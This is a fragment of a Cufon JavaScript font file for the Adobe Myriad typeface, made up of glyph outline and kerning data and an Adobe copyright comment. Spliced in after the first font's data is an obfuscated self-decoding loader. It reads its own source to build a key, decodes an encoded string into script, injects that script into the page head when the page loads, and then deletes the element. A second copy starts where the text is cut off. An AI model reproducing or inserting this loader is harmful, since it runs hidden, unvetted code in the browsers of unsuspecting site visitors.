":22}},{"d":"193,-68r-26,0r-60,-139r-60,139r-26,0r74,-166r24,0","w":214},{"d":"191,0r-168,-85r0,-21r168,-86r0,26r-140,71r140,69r0,26","w":214},{"d":"116,-146v-69,-11,-56,79,-56,146r-33,0r-1,-174r29,0r2,35v8,-22,29,-43,59,-38r0,31","w":122,"k":{"z":-3,"y":-9,"x":-6,"w":-9,"v":-9,"t":-9,"q":4,"o":2,"h":-2,"g":3,"f":-11,"e":2,"d":2,"c":2,"a":2,";":-4,":":-6,".":19,",":21}},{"d":"37,-112v0,79,83,121,151,85r5,17v-80,40,-177,-10,-177,-100v0,-75,58,-137,134,-137v62,0,108,45,108,106v0,45,-26,84,-65,84v-18,0,-28,-12,-29,-32v-21,45,-92,42,-92,-14v0,-59,66,-105,126,-77r-14,84v0,14,6,20,15,20v24,-1,38,-33,38,-63v0,-54,-35,-90,-90,-90v-63,0,-110,52,-110,117xm97,-105v0,32,37,36,52,12v18,-18,18,-44,24,-72v-41,-14,-76,22,-76,60","w":272},{"d":"30,-174v-6,-61,35,-100,92,-81r-4,26v-35,-14,-60,8,-55,55r43,0r0,25r-43,0r0,149r-33,0r0,-149r-25,0r0,-25r25,0","w":109,"k":{"}":-39,"t":-4,"s":4,"o":5,"g":5,"e":5,"d":5,"c":5,"]":-39,";":-10,":":-11,".":12,",":14,")":-39,"'":-15,"\"":-15}},{"d":"14,-84v0,-79,92,-126,136,-68r0,-104r34,0r1,256r-30,0r-2,-31v-11,21,-32,35,-62,35v-45,1,-77,-40,-77,-88xm101,-23v37,-1,49,-34,49,-80v0,-28,-23,-49,-48,-49v-34,-1,-55,29,-54,66v1,34,18,64,53,63","w":210,"k":{".":8,",":9}},{"d":"48,-87v0,55,55,79,102,55r6,26v-65,29,-142,-7,-142,-79v0,-73,77,-113,143,-83r-8,25v-45,-25,-101,3,-101,56","w":167,"k":{"y":-6,"t":-5,"o":2,"e":2,"d":2,".":3,",":5}},{"d":"21,-234r153,0r0,22r-105,212r-34,0r104,-206r-118,0r0,-28"},{"d":"99,-178v52,0,82,46,73,98r-126,0v-3,57,66,69,112,49r5,23v-65,31,-149,2,-149,-76v0,-52,33,-94,85,-94xm141,-104v6,-45,-49,-65,-78,-37v-9,9,-15,22,-17,37r95,0","w":186,"k":{".":5,",":7}},{"d":"98,-238v57,0,80,54,80,118v0,69,-23,124,-84,124v-55,0,-81,-55,-81,-120v0,-66,27,-122,85,-122xm95,-212v-67,0,-66,190,0,190v40,0,49,-46,49,-96v0,-50,-9,-94,-49,-94"}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+148-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("-Nn9SL;!A7YC-}^f1LPxTNTY2y;9nLYC2yKxA7E>n=rM`X!,2P03SyJUIy921P^-`7Ko5=9D59PrAD1h{yO=T90,D[%d@}tRPN[TK-jo;cI{E5#D=72`nASB1?U3O,~V^L>kJFhM+C_0GxX!9y4g%(frY*|B1#d0`#@4?=3MSPk+B2nSE#E0?,EIc2oO-XRyo90_j,^cK5kYERO;?XTg;#%5-[!>n4O@E>D({,n7Dy%3c9grBV@LnNo4n#d,j>;0SN^!-}T,-5GJI#dMBt9,j>dMSt90jLG^SL1!A}G>I7TCn,%>S[^0A[oY?4!fA7`k`,%_AX!_2,3|c>14190C-#rkIXJ,n7GM`7K_SyKO`L=BjL;_S2GMSy;OSNO_B4{JK}YJj>E^B4{kSNY~`2EJSygCANYX1N%OS7DJ-7n_B,3fA#GMcxMhA5^>7y;SA=91I2@SA=9Y-53J")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":191,"face":{"font-family":"myriad","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 3 3 4 3 2 2 4","ascent":"288","descent":"-72","x-height":"4","bbox":"-17 -270 311 90","underline-thickness":"18","underline-position":"-27","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright 1992-1997 Adobe Systems Incorporated.  All Rights Reserved.
 * 
 * Trademark:
 * Myriad is a trademark of Adobe Systems Incorporated.
 * 
 * Description:
 * Myriad is an Adobe Originals typeface designed by Robert Slimbach and Carol
 * Twombly in 1992. Myriad is a sans serif design that works well as a text face as
 * well as providing flexibility for filling display needs. Myriad Web has been
 * optimized for onscreen use.
 * 
 * Manufacturer:
 * Adobe Systems Incorporated
 * 
 * Designer:
 * Robert Slimbach and Carol Twombly
 * 
 * Vendor URL:
 * http://www.adobe.com/type
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"109,-180v53,0,93,38,93,90v0,56,-41,94,-96,94v-54,0,-94,-37,-94,-91v0,-56,41,-93,97,-93xm107,-140v-26,0,-38,25,-38,52v0,28,13,52,38,52v24,-1,37,-24,37,-52v-1,-27,-10,-52,-37,-52","w":213,"k":{"z":4,"y":5,"x":9,"w":3,"v":5,".":14,",":13}},{"d":"103,-180v59,0,89,50,79,110r-117,0v4,38,67,38,102,25r7,37v-69,30,-167,5,-162,-78v3,-51,37,-94,91,-94xm132,-108v4,-29,-35,-47,-56,-26v-6,6,-10,16,-12,26r68,0","w":194,"k":{"y":5,"x":5,"w":2,"v":4,".":6,",":8}},{"d":"150,0r-66,0r-80,-243r61,0r54,190v14,-59,38,-131,56,-190r59,0","w":236,"k":{"}":-15,"y":8,"u":14,"r":13,"o":22,"e":21,"a":19,"]":-16,"S":3,"Q":8,"O":8,"G":8,"C":8,"A":29,";":13,":":11,".":35,",":34,")":-15}},{"d":"12,-87v-8,-74,88,-126,133,-68r2,-21r48,0r-1,150v0,69,-32,102,-101,102v-26,0,-48,-5,-65,-14r11,-43v39,26,113,17,99,-44v-42,55,-134,7,-126,-62xm106,-42v28,0,32,-28,32,-61v0,-19,-13,-36,-32,-35v-24,0,-37,22,-37,49v0,24,13,47,37,47","w":216,"k":{".":11,",":13}},{"d":"139,0r-55,0r0,-100r-80,-143r64,0v29,67,45,102,46,105v6,-15,21,-50,45,-105r63,0r-83,141r0,102","w":225,"k":{"}":-16,"v":21,"u":28,"t":18,"q":41,"o":42,"l":7,"i":9,"e":42,"d":42,"a":36,"]":-17,"Y":-10,"X":-3,"W":-6,"V":-7,"T":-10,"S":12,"Q":19,"O":19,"G":19,"C":19,"A":38,";":21,":":19,".":45,",":44,")":-17}},{"d":"155,0v-15,-17,-8,-104,-59,-95r-17,0r0,95r-55,0r0,-239v69,-11,179,-16,179,64v0,30,-22,52,-44,61v30,-1,49,112,53,114r-57,0xm147,-170v2,-33,-40,-38,-68,-32r0,67v35,2,66,-3,68,-35","w":218,"k":{"y":-2,"t":-3,"i":-4,"h":-3,"a":-4,"Y":8,"X":-3,"V":2,"U":2,"T":3,"Q":2,"O":2,"G":2,"C":2,"A":-4}},{"d":"137,-86v32,44,-9,90,-66,90v-23,0,-42,-5,-59,-13r10,-39v16,13,91,23,68,-12v-29,-12,-80,-30,-73,-62v-2,-55,76,-71,124,-48r-9,39v-21,-15,-77,-14,-55,14v14,10,50,17,60,31","w":160,"k":{".":4,",":5}},{"d":"4,-176r60,0v23,76,35,117,35,124r2,0v7,-41,22,-84,33,-124r59,0r-67,176r-57,0","w":196,"k":{"y":-6,"w":-6,"s":6,"q":6,"o":7,"e":7,"d":7,"c":7,"a":6,";":-3,":":-5,".":20,",":22}},{"d":"151,-66v-39,6,-94,-74,-102,-3r-34,0v0,-45,16,-68,50,-68v38,-9,95,74,100,2r35,0v1,43,-12,64,-49,69","w":214},{"d":"222,0r-65,0r-45,-87r-41,87r-65,0r74,-123r-71,-120r65,0r42,85v5,-14,17,-43,38,-85r65,0r-71,118","w":229,"k":{"y":14,"u":5,"i":3,"e":8,"a":4,"Y":-4,"W":-3,"V":-3,"T":-2,"Q":17,"O":17,"G":17,"C":17,"A":-2}},{"d":"64,-249r38,0v-48,76,-48,214,0,291r-38,0v-55,-78,-54,-213,0,-291","w":115,"k":{"Y":-14,"W":-15,"V":-15,"T":-16,"J":-4}},{"d":"13,-249r49,0r-8,97r-33,0","w":75},{"d":"138,-95v7,-52,-60,-51,-60,-9r0,104r-55,0r0,-256r55,0r1,102v9,-13,29,-26,51,-26v80,0,63,101,64,180r-56,0r0,-95","w":216,"k":{"y":7,"v":7,"t":2}},{"d":"24,0r0,-243r55,0r0,107r76,-107r69,0r-83,103r88,140r-66,0r-62,-105r-22,26r0,79r-55,0","w":227,"k":{"y":17,"w":17,"v":19,"u":8,"o":8,"e":7,"Q":17,"O":17,"G":17,"C":17,"A":-5}},{"d":"4,-176r57,0r26,130v6,-42,22,-90,32,-130r44,0r32,130v2,-18,11,-62,26,-130r54,0r-54,176r-53,0v-20,-75,-19,-64,-29,-117v-7,44,-19,78,-30,117r-52,0","w":279,"k":{"y":-7,"v":-6,"s":3,"q":4,"o":5,"e":4,"d":4,"c":4,"a":3,";":-3,":":-5,".":17,",":19}},{"d":"21,33v24,-5,57,-26,48,-48r-66,-161r61,0r38,119r31,-119r60,0r-41,111v-29,71,-42,130,-120,145","w":193,"k":{"w":-6,"v":-6,"s":4,"q":5,"o":5,"g":5,"e":5,"d":5,"c":5,"a":2,";":-3,":":-5,".":18,",":19}},{"d":"118,14r-37,0r-76,-261r37,0","w":125},{"d":"100,40r-75,0r0,-287r75,0r0,31r-35,0r0,226r35,0r0,30","w":115,"k":{"Y":-16,"W":-16,"V":-16,"T":-17,"J":-4}},{"d":"173,0v-62,-110,-65,-105,-98,-181r-2,0v4,51,3,122,3,181r-52,0r0,-243r66,0v35,59,65,105,95,173v-6,-41,-5,-118,-5,-173r52,0r0,243r-59,0","w":255,"k":{"y":2}},{"d":"87,0r-1,-185r-45,22r-9,-42r63,-29r46,0r0,234r-54,0"},{"d":"33,-270r39,0r0,360r-39,0r0,-360","w":104},{"d":"73,0r0,-196r-68,0r0,-47r193,0r0,47r-69,0r0,196r-56,0","w":203,"k":{"}":-16,"z":20,"y":21,"w":20,"u":20,"s":27,"r":20,"o":30,"m":20,"i":3,"h":5,"e":30,"a":24,"]":-17,"Y":-11,"X":-6,"W":-10,"V":-11,"T":-8,"S":4,"Q":11,"O":11,"G":11,"C":11,"A":27,";":18,":":16,".":31,",":29,")":-16}},{"d":"229,-108v0,72,-36,111,-105,112v-67,0,-100,-38,-100,-113r0,-134r56,0v8,74,-28,203,46,203v73,0,40,-132,47,-203r56,0r0,135","w":253,"k":{"z":3,"y":2,"x":5,"v":2,"s":5,"r":3,"p":2,"f":-2,"a":3,"A":12}},{"d":"23,0r0,-256r55,0r0,256r-55,0","w":100},{"d":"104,-247r32,18r-39,48r58,-12r0,37v-19,-2,-42,-9,-59,-9r40,44r-32,19v-8,-18,-13,-39,-22,-56r-20,56r-32,-19r39,-45r-57,10r0,-37v18,3,40,11,56,11r-38,-47r32,-18v8,18,12,39,21,56","w":166},{"d":"13,-249r50,0r-9,97r-33,0xm83,-249r50,0r-8,97r-33,0","w":145},{"d":"78,-82v-6,54,58,50,59,10r0,-104r56,0r1,176r-48,0v-2,-8,2,-22,-4,-26v-32,55,-120,30,-120,-47r0,-103r56,0r0,94","w":215,"k":{".":4,",":5}},{"d":"123,-1v-48,15,-93,-3,-93,-63r0,-71r-24,0r0,-41r24,0r0,-33r54,-15r0,48r40,0r0,41r-40,0v4,40,-17,108,39,92r0,42","w":134,"k":{"y":-2,"o":2,"g":2,"e":2,"d":2,"c":2,".":3,",":4}},{"d":"203,-168v-2,64,-55,89,-124,82r0,86r-55,0r0,-240v77,-12,181,-9,179,72xm148,-167v0,-32,-39,-40,-69,-34r0,72v33,6,69,-6,69,-38","w":214,"k":{"y":-3,"u":4,"t":-4,"s":7,"r":4,"o":9,"n":4,"e":9,"a":6,"A":25,";":5,":":3,".":53,",":52}},{"d":"52,42r-39,0v48,-78,48,-213,0,-291r39,0v55,76,54,214,0,291","w":115},{"d":"103,40v-71,9,-64,-46,-64,-104v0,-16,-9,-25,-27,-26r0,-27v40,2,23,-50,23,-82v-1,-36,26,-51,68,-48r0,31v-60,-6,7,108,-56,113v39,3,30,49,28,87v-1,19,9,28,28,26r0,30","w":115,"k":{"Y":-14,"W":-14,"V":-14,"T":-16,"J":-4}},{"d":"-14,35v39,-4,44,-23,44,-71r0,-140r56,0v-7,108,35,261,-95,254xm58,-257v17,1,31,10,31,29v0,17,-14,29,-31,29v-17,0,-31,-12,-31,-29v0,-17,14,-30,31,-29","w":107,"k":{".":4,",":5}},{"d":"24,0r0,-243r153,0r0,46r-97,0r0,55r91,0r0,45r-91,0r0,97r-56,0","w":195,"k":{"y":8,"u":11,"r":9,"o":9,"l":6,"i":8,"e":10,"a":15,"A":26,";":8,":":6,".":33,",":35}},{"d":"9,0r0,-30r120,-167r-109,0r0,-46r182,0r0,32r-117,165r119,0r0,46r-195,0","w":215,"k":{"y":7,"w":10,"u":5,"o":4,"e":4,"Q":9,"O":9,"G":9,"C":9,"A":-3}},{"w":74,"k":{"Y":16,"W":14,"V":14,"T":15}},{"d":"182,-164v-5,62,-34,72,-86,119r90,0r0,45r-170,0r0,-33v70,-67,93,-65,110,-126v-2,-47,-62,-39,-91,-14r-16,-40v53,-44,169,-31,163,49"},{"d":"76,-94v-39,1,-66,-30,-66,-70v0,-40,26,-74,67,-74v40,0,66,29,66,70v0,42,-27,74,-67,74xm77,-207v-35,1,-33,81,0,83v16,0,24,-14,24,-42v0,-20,-5,-41,-24,-41xm110,4r-30,0r135,-242r30,0xm249,4v-39,0,-66,-31,-66,-71v0,-41,27,-74,68,-74v40,0,65,30,65,70v0,43,-28,74,-67,75xm250,-110v-34,0,-34,83,0,83v16,0,24,-14,24,-42v0,-20,-5,-41,-24,-41","w":326},{"d":"8,0r0,-32r86,-100r-80,0r0,-44r149,0r0,33r-66,79v-4,6,-13,11,-19,20r88,0r0,44r-158,0","w":173,"k":{"y":-3,"o":3,"e":3,"d":3,"c":3}},{"d":"128,-214v-27,-8,-49,6,-44,38r36,0r0,41r-36,0r0,135r-56,0r0,-135r-23,0r0,-41r23,0v-3,-62,40,-95,102,-81","w":125,"k":{"}":-30,"t":-6,"s":3,"o":3,"g":3,"e":3,"d":3,"c":3,"]":-30,";":-10,":":-10,".":14,",":16,")":-30,"'":-6,"\"":-6}},{"d":"80,-199v0,32,-19,84,24,82r0,27v-41,0,-24,48,-24,81v1,38,-25,52,-68,49r0,-30v63,6,-8,-108,56,-114v-39,-3,-30,-50,-27,-86v1,-20,-9,-28,-29,-26r0,-31v42,-3,68,11,68,48","w":115},{"d":"133,-127v-29,-7,-56,6,-55,38r0,89r-55,0r-2,-176r48,0v2,10,0,24,3,33v8,-24,31,-41,61,-36r0,52","w":140,"k":{"z":-3,"y":-6,"x":-4,"w":-8,"v":-6,"t":-8,"q":6,"o":3,"g":3,"f":-10,"e":3,"d":3,"c":3,"a":4,";":2,".":24,",":24}},{"d":"0,27r180,0r0,18r-180,0r0,-18","w":180},{"d":"209,-91v9,75,-83,124,-131,74r0,88r-56,0r-1,-247r48,0r3,25v43,-59,146,-20,137,60xm153,-88v0,-56,-75,-65,-75,-10v0,33,5,59,35,59v26,0,40,-22,40,-49","w":221,"k":{"z":3,"y":4,"w":3,".":14,",":13}},{"d":"210,-91v9,79,-95,129,-139,66r-3,25r-47,0r1,-256r56,0r1,102v41,-56,141,-13,131,63xm153,-89v0,-56,-75,-66,-75,-10v0,34,6,59,35,59v26,0,40,-22,40,-49","w":221,"k":{"y":4,"w":3,"v":4,".":15,",":17}},{"d":"16,-247r74,0r0,287r-74,0r0,-30r34,0r0,-226r-34,0r0,-31","w":115},{"d":"1,-252r51,0r32,55r-38,0","w":108},{"d":"150,-190v0,46,-54,61,-50,111r-48,0v-11,-47,38,-68,42,-103v3,-29,-47,-23,-63,-10r-13,-39v43,-28,132,-22,132,41xm75,-62v20,0,32,14,33,33v0,20,-13,33,-33,33v-20,0,-33,-13,-33,-33v0,-20,13,-33,33,-33","w":164},{"d":"12,-86v-8,-73,82,-123,131,-74r0,-96r55,0r2,256r-50,0v-2,-8,0,-20,-3,-27v-38,64,-145,18,-135,-59xm108,-40v27,-1,38,-25,35,-60v-2,-21,-14,-38,-35,-38v-25,0,-39,22,-39,50v0,28,13,48,39,48","w":220,"k":{".":11,",":13}},{"d":"135,-247v71,0,120,53,120,124v0,75,-50,127,-123,127v-71,0,-119,-54,-119,-124v0,-72,51,-127,122,-127xm134,-203v-41,0,-62,38,-62,82v0,43,23,80,62,81v42,0,62,-38,62,-82v0,-43,-22,-80,-62,-81","w":268,"k":{"y":-4,"x":5,"w":-4,"v":-3,"t":-5,"o":-3,"g":-2,"f":-4,"e":-2,"d":-2,"c":-2,"Y":15,"X":16,"W":3,"V":7,"T":12,"A":9,".":13,",":14}},{"d":"78,0r-55,0r0,-176r55,0r0,176xm50,-257v18,0,32,13,32,29v0,16,-14,29,-32,29v-17,0,-31,-13,-31,-29v0,-16,14,-29,31,-29","w":100},{"d":"72,-122v0,58,52,92,109,76r0,-50r-40,0r0,-43r94,0r0,127v-102,37,-222,5,-222,-106v0,-106,117,-151,213,-115r-11,44v-59,-26,-143,-7,-143,67","w":254,"k":{"y":2,"o":-3,"e":-3,"a":-3}},{"d":"24,-243r56,0r0,94r95,0r0,-94r56,0r0,243r-56,0r0,-101r-95,0r0,101r-56,0r0,-243","w":255},{"d":"3,-176r62,0v18,26,26,46,34,55v3,-7,13,-26,30,-55r61,0r-60,83r61,93r-64,0v-19,-30,-26,-50,-33,-58v-3,7,-13,26,-31,58r-62,0r62,-90","w":192,"k":{"y":-7,"w":-7,"v":-6,"t":-5,"s":3,"q":8,"o":8,"e":8,"d":8,"c":8}},{"d":"109,-135v-50,0,-26,86,-31,135r-55,0r-2,-176r48,0v2,8,0,19,4,25v35,-54,121,-27,121,48r0,103r-56,0v-5,-47,18,-135,-29,-135","w":216,"k":{"y":7,"v":7,"t":2}},{"d":"12,-86v-8,-76,87,-126,132,-69r1,-21r54,0r-1,247r-55,0r-1,-94v-42,59,-140,12,-130,-63xm108,-40v29,0,35,-27,35,-61v0,-21,-16,-35,-35,-36v-26,0,-39,21,-39,49v0,28,13,48,39,48","w":220,"k":{".":11,",":3}},{"d":"37,39r-37,3v12,-34,21,-67,27,-102r56,-4v-13,39,-28,74,-46,103","w":94,"k":{" ":22}},{"d":"90,-192r35,0r0,79r75,0r0,34r-75,0r0,79r-35,0r0,-79r-75,0r0,-34r75,0r0,-79","w":214},{"d":"78,-256r1,154v3,-6,20,-31,50,-74r68,0r-66,71r75,105r-69,0r-44,-72r-15,17r0,55r-56,0r0,-256r56,0","w":200,"k":{"y":-2,"w":-2,"r":-3,"p":-4,"o":5,"n":-4,"m":-4,"l":-4,"i":-4,"h":-4,"g":5,"e":4,"b":-4}},{"d":"105,-135v-47,5,-22,87,-28,135r-54,0r-2,-176r47,0v2,7,0,18,4,24v20,-39,90,-35,104,3v36,-56,119,-31,119,46r0,103r-54,0v-5,-46,17,-135,-27,-135v-48,0,-22,88,-28,135r-54,0v-6,-48,19,-129,-27,-135","w":317,"k":{"y":7,"v":7,"t":2}},{"d":"171,-113v33,42,1,106,-51,108r0,37r-36,0r0,-35v-25,-1,-47,-6,-64,-15r11,-43v21,11,41,16,62,16v28,0,49,-24,27,-39v-33,-23,-100,-26,-98,-80v1,-37,28,-60,63,-65r0,-33r36,0r0,31v21,1,39,5,54,12r-11,42v-27,-23,-113,-15,-75,22v19,12,69,26,82,42"},{"d":"18,-234r170,0r0,35r-99,199r-60,0r100,-189r-111,0r0,-45"},{"d":"114,-247v37,0,68,21,68,57v0,27,-19,46,-49,64r41,45v10,-16,18,-36,22,-60r50,0v-7,40,-22,71,-42,93r44,48r-65,0v-5,-5,-10,-11,-16,-18v-48,40,-155,24,-155,-47v0,-31,18,-53,47,-71v-43,-43,-8,-111,55,-111xm113,-212v-31,4,-28,41,-5,59v16,-11,25,-16,27,-35v1,-12,-9,-25,-22,-24xm84,-108v-35,20,-19,74,22,72v14,0,25,-5,34,-13v-12,-11,-31,-31,-56,-59","w":250},{"d":"101,4v-48,0,-87,-24,-89,-65v-1,-28,17,-46,43,-60v-69,-32,-24,-126,49,-117v75,-8,109,81,45,113v25,8,44,27,44,58v0,46,-42,71,-92,71xm103,-201v-42,5,-38,51,5,59v30,-6,32,-60,-5,-59xm99,-101v-15,2,-31,15,-30,34v0,18,15,33,34,32v19,0,34,-10,34,-28v0,-22,-21,-35,-38,-38"},{"d":"53,-179v19,0,33,14,33,34v0,20,-13,33,-33,33v-20,0,-33,-13,-33,-33v0,-20,14,-34,33,-34xm37,40r-37,3v12,-34,21,-68,27,-103r56,-4v-13,39,-28,75,-46,104","w":94,"k":{" ":14}},{"d":"69,-89v0,42,44,59,83,44r7,40v-66,27,-147,-6,-147,-81v0,-72,75,-112,147,-87r-9,41v-36,-17,-81,2,-81,43","w":167,"k":{"y":-5,"t":-6,"o":4,"e":4,"d":4,".":4,",":5}},{"d":"171,-115v41,58,-11,119,-85,119v-27,0,-50,-6,-71,-16r12,-45v21,11,42,16,63,16v31,0,52,-26,30,-45v-6,-5,-18,-10,-33,-15v-46,-15,-69,-40,-69,-73v-2,-69,99,-89,158,-60r-12,44v-30,-21,-112,-15,-81,28v15,13,75,29,88,47","w":200,"k":{"y":6,"w":7,"v":8,"t":2,"q":-3,"l":2,"k":2,"j":4,"h":2,"e":-3,"a":-3}},{"d":"69,-80r-41,0r-8,-163r57,0xm49,-62v19,0,32,14,32,33v0,19,-13,33,-32,33v-20,0,-33,-13,-33,-33v0,-20,13,-33,33,-33","w":97},{"d":"126,0r-61,0r-60,-243r60,0r35,185v3,-23,15,-85,37,-185r61,0v19,98,30,160,33,184v2,-18,14,-80,36,-184r57,0r-65,243r-61,0v-16,-80,-25,-125,-27,-136v-2,-11,-4,-26,-6,-45","w":328,"k":{"}":-15,"y":5,"u":12,"t":3,"r":10,"o":19,"m":10,"i":5,"h":3,"e":18,"d":16,"a":17,"]":-16,"T":-8,"S":3,"Q":3,"O":3,"G":3,"C":3,"A":21,";":10,":":9,".":26,",":28,")":-15}},{"d":"173,-147r0,45r-93,0r0,57r104,0r0,45r-160,0r0,-243r155,0r0,46r-99,0r0,50r93,0","w":198,"k":{"z":-3,"y":6,"w":4,"v":5,"u":4,"t":3,"s":-2,"l":-2,"k":-2,"j":2,"g":3,"f":2,"e":3,"d":3,"c":4,"W":-3,".":3,",":5}},{"d":"184,-68v3,74,-114,89,-170,55r12,-42v34,19,100,27,100,-16v0,-31,-37,-35,-72,-33r0,-40v31,2,63,-1,66,-26v-5,-35,-61,-27,-87,-10r-12,-40v48,-31,155,-25,155,41v1,27,-17,43,-44,55v29,5,51,25,52,56"},{"w":74,"k":{"Y":16,"W":14,"V":14,"T":15}},{"d":"102,-238v101,0,114,147,56,203v-30,29,-63,40,-125,38r0,-43v53,6,98,-17,102,-58v-42,41,-124,7,-124,-56v0,-47,42,-84,91,-84xm101,-120v20,-1,35,-9,35,-28v0,-26,-11,-49,-36,-49v-21,-1,-33,19,-33,40v0,21,12,38,34,37"},{"d":"194,-112r0,33r-173,79r0,-38r133,-58r-133,-57r0,-39","w":214},{"d":"6,-46v40,11,69,0,69,-45r0,-152r55,0v-6,106,32,247,-88,247v-16,0,-30,-2,-42,-6","w":152,"k":{"}":-6,"a":2,"]":-6,")":-6}},{"d":"11,-112r97,0r0,36r-97,0r0,-36","w":118},{"d":"51,-63v20,0,33,13,33,33v0,20,-13,34,-33,34v-20,0,-33,-14,-33,-34v0,-20,13,-33,33,-33","w":94,"k":{" ":22}},{"d":"44,14r-36,0r76,-261r37,0","w":121},{"d":"107,4v-103,0,-121,-143,-60,-201v29,-29,61,-42,122,-40r0,42v-52,-2,-93,16,-100,56v46,-40,126,-9,126,58v0,48,-40,85,-88,85xm139,-77v0,-51,-71,-52,-73,-8v-1,25,14,48,40,48v21,0,33,-19,33,-40"},{"d":"24,-243r56,0r0,243r-56,0r0,-243","w":104,"k":{"t":-3}},{"d":"24,0r0,-243r56,0r0,196r100,0r0,47r-156,0","w":189,"k":{"y":13,"w":14,"u":4,"o":3,"e":4,"Y":42,"W":24,"V":32,"U":12,"T":40,"Q":14,"O":14,"G":14,"C":14,"A":-2}},{"d":"110,-243v29,99,31,96,45,168r2,0v17,-76,30,-107,50,-168r74,0r13,243r-55,0r-6,-196v-6,26,-26,90,-59,192r-44,0v-20,-70,-32,-114,-36,-130v-4,-16,-9,-36,-14,-62r-9,196r-52,0r16,-243r75,0","w":313,"k":{"i":-3}},{"d":"67,0r-32,0r9,-64r-30,0r0,-34r36,0r5,-40r-30,0r0,-34r36,0r9,-62r32,0r-9,62r34,0r9,-62r33,0r-9,62r29,0r0,34r-35,0r-5,40r30,0r0,34r-36,0r-9,64r-33,0r9,-64r-33,0xm82,-98r34,0r6,-40r-34,0","w":203},{"d":"156,-63r-73,0r-18,63r-58,0r77,-243r73,0r79,243r-61,0xm91,-104r56,0v-15,-47,-25,-80,-29,-98","w":244,"k":{"z":-4,"y":12,"w":13,"v":17,"u":6,"t":8,"s":2,"r":3,"q":5,"p":3,"o":5,"n":3,"m":3,"l":3,"k":3,"j":3,"i":3,"h":3,"g":5,"f":5,"e":5,"d":5,"c":5,"b":2,"Y":38,"W":23,"V":30,"U":13,"T":34,"Q":9,"O":9,"G":9,"C":9}},{"d":"246,-127v5,113,-106,143,-222,126r0,-238v24,-4,50,-6,77,-6v93,-2,141,38,145,118xm187,-125v0,-60,-46,-85,-107,-75r0,158v63,8,107,-23,107,-83","w":259,"k":{"y":-5,"o":-2,"e":-2,"Y":15,"W":3,"V":5,".":16,",":15}},{"d":"72,-121v0,68,67,95,129,71r9,43v-90,34,-197,-10,-197,-111v0,-101,106,-155,199,-117r-11,43v-60,-25,-129,2,-129,71","w":222,"k":{"z":-2,"y":13,"u":8,"r":2,"o":8,"l":2,"i":2,"e":8,"a":4,"Q":12,"O":12,"G":12,"C":12,"A":-3}},{"d":"199,-64r-39,0r-53,-128r-53,128r-39,0r75,-170r34,0","w":214},{"d":"51,-179v19,0,32,15,33,34v0,20,-13,33,-33,33v-20,0,-33,-13,-33,-33v0,-20,14,-34,33,-34xm50,-63v19,0,33,14,33,34v0,20,-13,33,-33,33v-19,0,-32,-14,-32,-33v0,-20,13,-33,32,-34","w":94,"k":{" ":16}},{"d":"209,-71v0,76,-105,80,-185,70r0,-238v65,-11,176,-15,176,56v0,28,-20,42,-40,52v27,7,49,28,49,60xm79,-147v32,1,62,-2,65,-30v3,-26,-39,-30,-65,-26r0,56xm150,-73v0,-32,-35,-36,-71,-34r0,67v29,4,71,-1,71,-33","w":222,"k":{"y":2,"o":-3,"e":-3,"W":5,"V":5,"T":7,"A":2,".":9,",":6}},{"d":"23,-164v56,-31,149,-20,149,60v0,33,-2,77,3,104r-50,0v-2,-6,-1,-14,-4,-18v-29,39,-110,24,-110,-32v0,-54,53,-64,106,-70v-1,-33,-62,-24,-83,-9xm88,-35v23,-1,35,-20,31,-48v-35,0,-53,9,-53,27v0,13,8,22,22,21","w":194,"k":{"y":7,"w":4,"v":7,"t":3}},{"d":"200,-117r-186,0r0,-34r186,0r0,34xm200,-42r-186,0r0,-34r186,0r0,34","w":214},{"d":"168,0r-53,0r0,-56r-106,0r0,-36r90,-142r69,0r0,137r29,0r0,41r-29,0r0,56xm61,-97r54,0r1,-97v-25,53,-31,57,-55,97"},{"d":"26,-51v34,18,99,20,103,-24v3,-36,-55,-42,-101,-36r16,-123r132,0r0,45r-94,0r-5,35v62,-4,109,18,109,76v0,75,-105,101,-170,68"},{"d":"255,-124v0,52,-27,91,-60,109v15,4,35,9,60,14r-15,43v-35,-7,-74,-32,-118,-38v-63,-8,-109,-54,-109,-123v0,-72,50,-128,123,-128v70,0,119,52,119,123xm135,-203v-41,0,-63,38,-63,82v0,43,22,81,62,81v42,0,62,-38,62,-82v1,-43,-22,-80,-61,-81","w":268,"k":{"Y":16,"X":9,"W":3,"V":7,"T":11,"A":4}},{"d":"21,-80r0,-32r173,-80r0,39r-132,58r132,56r0,39","w":214},{"d":"103,-238v62,0,90,53,90,120v0,68,-27,122,-91,122v-62,0,-90,-54,-90,-120v0,-66,28,-123,91,-122xm103,-196v-51,0,-50,153,-1,159v30,-3,35,-40,35,-80v0,-53,-11,-79,-34,-79"},{"d":"48,-114v0,79,78,115,146,84r7,21v-82,38,-186,-10,-182,-101v4,-80,55,-135,137,-137v62,-1,111,44,111,106v0,46,-26,85,-69,84v-18,0,-30,-9,-32,-27v-22,41,-89,34,-89,-20v0,-64,70,-103,129,-75r-12,82v0,11,3,16,11,16v22,-2,35,-31,35,-60v0,-51,-36,-83,-88,-83v-59,0,-104,49,-104,110xm168,-157v-33,-8,-54,19,-54,48v0,27,25,28,38,12v12,-15,12,-38,16,-60","w":283}],f:f};try{(function(s){var 